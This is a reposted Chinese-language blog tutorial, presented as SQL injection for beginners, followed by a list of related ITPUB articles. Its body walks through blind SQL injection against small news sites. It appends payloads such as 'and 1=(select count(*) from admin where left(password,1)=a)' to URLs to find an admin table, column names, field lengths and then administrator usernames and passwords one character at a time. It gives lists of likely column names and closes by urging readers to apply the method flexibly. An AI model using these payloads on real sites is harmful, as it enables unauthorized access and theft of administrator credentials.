菜鳥學習SQL注射(轉)
菜鳥學習SQL注射(轉)[@more@]一般國內的小一點的新聞站點程式 都有 ""&request 這種漏洞,下面我講解攻擊方法在位址列:and 1=1檢視漏洞是否存在,如果存在就正常返回該頁,如果沒有,則顯示錯誤,繼續假設這個站的資料庫存在一個admin表在位址列:and 0<>(select count(*) from admin)返回頁正常,假設成立了。下面來猜猜看一下管理員表裡面有幾個管理員ID:and 1頁面什麼都沒有。管理員的數量等於或者小於1個and 1=(select count(*) from admin)輸入=1沒顯示錯誤,說明此站點只有一個管理員。下面就是要繼續猜測admin 裡面關於管理員使用者名稱和密碼的欄位名稱。and 1=(select count(*) from admin where len(username)>0)猜解錯誤!不存在 username 這個欄位。只要一直改變括號裡面的username這個欄位,下面給大家幾個常用的user,users,member,members,userlist,memberlist,userinfo,admin,manager,使用者,yonghu使用者名稱稱欄位猜解完成之後繼續猜解密碼欄位and 1=(select count(*) from admin where len(password)>0)password 欄位存在!因為密碼欄位一般都是這個拉,如果不是就試試pass如果還不是就自己想想吧我們已經知道了管理員表裡面有3個欄位 id,user,password。id 編號user 使用者名稱password 密碼下面繼續的就是管理員使用者名稱和密碼的猜解了。一個一個來,有點麻煩,最好找個猜解機來先猜出長度!and 1=(select count(*) from admin where len(user)<10)user 欄位長度小於10and 1=(select count(*) from admin where len(user)<5)user 欄位長度不小於5慢慢的來,最後猜出長度等於6,請看下面,返回正常就說明猜解正確and 1=(select count(*) from admin where len(user)=6)下面猜密碼,and 1=(select count(*) from admin where len(password)=10)猜出來密碼10位,不要奇怪,現在網管都有防備的,所以密碼上20位也不太奇怪了下面該做的就是把他們拆開來一個一個猜字母and 1=(select count(*) from admin where left(user,1)=a)返回正常,第一位字母等於a,千萬不要把大寫和小寫給搞錯了哦~~呵呵,如果不a就繼續猜其他的字元落,反正猜到返回正常就算OK了開始猜解帳號的第二位字元。and 1=(select count(*) from admin where left(user,2)=ad)就這樣一次加一個字元這樣猜,猜到夠你剛才猜出來的多少位了就對了,帳號就算出來了工作還沒有完,別忙著跑了,還有10位密碼,呵呵and 1=(select count(*) from admin where left(password,1)=a)經過無數次錯誤之後...... and 1=(select count(*) from admin where left(password,10)=administra)結果密碼是administra看完文章,大家不要照著我的文章做,網路上的東西是變幻無窮的,但是我相信大家的大腦肯定比他變得快,所以希望大家看了這個文章靈活運用!那樣才能達到理想的效果=========================文章型別:轉載 提交:沙加II 核查:NetDemo
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/8225414/viewspace-945599/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- IT菜鳥的學習生活
- 菜鳥的資訊保安學習之路
- 菜鳥學習寫的Ioc工具
- python菜鳥教程學習1:背景性學習Python
- 菜鳥教程python 學習進度Python
- 菜鳥也想學習JSON解析JSON
- 菜鳥學習SHELL第一課---地址本的指令碼(轉)指令碼
- 菜鳥入門 個人學習Linux知識總結(轉)Linux
- JavaScript 非同步及Promise 菜鳥學習心得JavaScript非同步Promise
- python菜鳥教程學習9:函式Python函式
- Android菜鳥學習js筆記一AndroidJS筆記
- 菜鳥學堂之破解Sessioncookie的方法(轉)SessionCookie
- 【菜鳥讀原始碼】halo✍原始碼學習 (一)原始碼
- 鳥哥私房菜學習筆記(第零章)筆記
- linux-鳥哥私房菜學習筆記Linux筆記
- python菜鳥教程學習13:檔案操作Python
- 一個菜鳥管理的學習和思考(一)
- 一個菜鳥管理的學習和思考(二)
- 菜鳥也玩mysql之學習筆記篇MySql筆記
- linux學習導讀_鳥哥的私房菜Linux
- 菜鳥初學Java的備忘錄(二) (轉)Java
- 菜鳥初學Java的備忘錄(五) (轉)Java
- 菜鳥初學Java的備忘錄(八) (轉)Java
- 菜鳥初學Java的備忘錄(七) (轉)Java
- 菜鳥初學Java的備忘錄(九) (轉)Java
- 菜鳥初學Java的備忘錄(四) (轉)Java
- 菜鳥初學Java的備忘錄(六) (轉)Java
- 菜鳥初學Java的備忘錄(十) (轉)Java
- 菜鳥初學Java的備忘錄(一) (轉)Java
- 菜鳥初學Java的備忘錄(三) (轉)Java
- SQL注射/SQL Injection漏洞SQL
- 菜鳥也裝Linux(轉)Linux
- python菜鳥教程學習3:基礎語法Python
- python菜鳥教程學習5: python運算子Python
- Java菜鳥到大牛學習路線培訓教程Java
- 跟著菜鳥學pythonPython
- 菜鳥學Java(十七)——Jboss瘦身Java
- 菜鳥學Java(十八)——異常Java